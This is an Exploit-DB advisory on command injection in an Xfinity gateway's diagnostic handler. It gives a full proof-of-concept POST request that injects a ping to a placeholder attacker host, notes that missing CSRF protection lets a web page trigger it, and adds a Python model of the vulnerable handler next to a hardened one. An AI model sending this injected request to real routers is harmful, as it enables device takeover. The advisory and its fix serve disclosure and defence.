Xfinity Gateway – Remote Code Execution

  • Author: Gregory Smiley
    Date: 2016-12-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40856/
  • # Exploit Title: Xfinity Gateway: Remote Code Execution
    # Date: 12/2/2016
    # Exploit Author: Gregory Smiley
    # Contact: gsx0r.sec@gmail.com
    # Vendor Homepage: http://xfinity.com
    # Platform: php
    
    The page at /network_diagnostic_tools.php has a "test connectivity" feature, which is carried out through a POST request to /actionHandler/ajax_network_diagnostic_tools.php. The destination_address parameter of that request is vulnerable to OS command injection: shell metacharacters in its value are interpreted by the command the handler runs to perform the connectivity test.
    
    PoC:
    
    POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
    Host: 10.0.0.1
    User-Agent:
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://10.0.0.1/network_diagnostic_tools.php
    Content-Length: 91
    Cookie: PHPSESSID=; auth=
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: keep-alive
    
    test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
    
    
    If you open Wireshark with the display filter ip.dst==attackerip and icmp, you will see the router issue three ICMP echo requests, proving that the injected command ran. This can be leveraged to completely compromise the device.
    
    This vulnerability is also particularly dangerous because the application has no CSRF protection, as demonstrated in https://www.exploit-db.com/exploits/40853/ : a malicious web page visited from a browser on the gateway's LAN can issue this POST without the user's knowledge.
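The following is an added example, not code from the original advisory and not the gateway's own firmware (its PHP handler is not on this page, so the shape of the vulnerable code below is an assumption). It reconstructs in Python how the PoC body above reaches a ping-style handler, what the injected value turns into when interpolated into a shell command, and a hardened version that validates destination_address and count1 and runs ping as an argv list with no shell. The form parser, the validators and the simplified shell-operator splitter are all hypothetical helpers written for this example.

```python
"""
Added example: a vulnerable "test connectivity" ping handler next to a
hardened one. The handler layout is an assumption; the gateway's real
PHP code is not on the page.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# Constructed copy of the advisory's PoC request body. "attackerip" is
# the advisory's own placeholder and is kept as-is.
POC_BODY = ("test_connectivity=true"
            "&destination_address=www.comcast.net || ping -c3 attackerip; "
            "&count1=4")


def parse_form(body: str) -> dict:
    """Split an application/x-www-form-urlencoded body on '&' only.

    Splitting on '&' alone (never on ';') matters here: the injected
    value carries a ';' that must stay inside destination_address,
    exactly as the handler on the gateway would receive it.
    """
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def build_ping_command_vulnerable(destination: str, count: str) -> str:
    """Assumed vulnerable pattern: raw form fields interpolated into one
    string that is later handed to a shell (exec()/system() in PHP,
    subprocess with shell=True in Python). Nothing is validated."""
    return f"ping -c {count} {destination}"


def shell_command_list(cmd: str) -> list:
    """Simplified model of how a POSIX shell splits a command line on the
    control operators ||, &&, ;, | and newline (quoting is ignored; this
    is an illustration, not a shell parser)."""
    parts = re.split(r"\s*(?:\|\||&&|;|\||\n)\s*", cmd)
    return [p for p in parts if p]


# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, no leading or
# trailing hyphen, at most 253 characters overall.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def validate_destination(destination: str) -> str:
    """Accept an IPv4/IPv6 literal or an RFC 1123 hostname; reject all else.
    Because a label cannot start with '-', the result can never be
    mistaken for a ping option either."""
    try:
        return str(ipaddress.ip_address(destination))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(destination):
        return destination
    raise ValueError(f"invalid destination_address: {destination!r}")


def validate_count(count: str, maximum: int = 10) -> int:
    """Only a small positive integer is a sensible packet count."""
    if not count.isdigit() or not 1 <= int(count) <= maximum:
        raise ValueError(f"invalid count: {count!r}")
    return int(count)


def build_ping_argv(destination: str, count: str) -> list:
    """Hardened version: validated inputs, argv list, no shell.
    Run it with subprocess.run(argv) (no shell=True)."""
    return ["ping", "-c", str(validate_count(count)),
            validate_destination(destination)]


def rejects(destination: str, count: str) -> bool:
    """True if the hardened builder refuses this input."""
    try:
        build_ping_argv(destination, count)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    fields = parse_form(POC_BODY)
    cmd = build_ping_command_vulnerable(fields["destination_address"], fields["count1"])
    print("vulnerable command line:", repr(cmd))
    print("commands the shell would run:", shell_command_list(cmd))
    print("hardened builder rejects PoC:", rejects(fields["destination_address"], fields["count1"]))
    print("hardened argv for a valid host:", build_ping_argv("www.comcast.net", "4"))
```

Two details of the PoC are worth noting against this model. The `||` operator runs the injected ping only when the preceding ping exits non-zero, and the trailing `; ` terminates the injected command so that anything the handler appends after the destination is parsed as a separate (probably failing) command rather than as extra arguments to the attacker's ping. The hardened builder never reaches that stage: the payload fails both the IP-literal and hostname checks, and a value that passes cannot contain a shell operator at all.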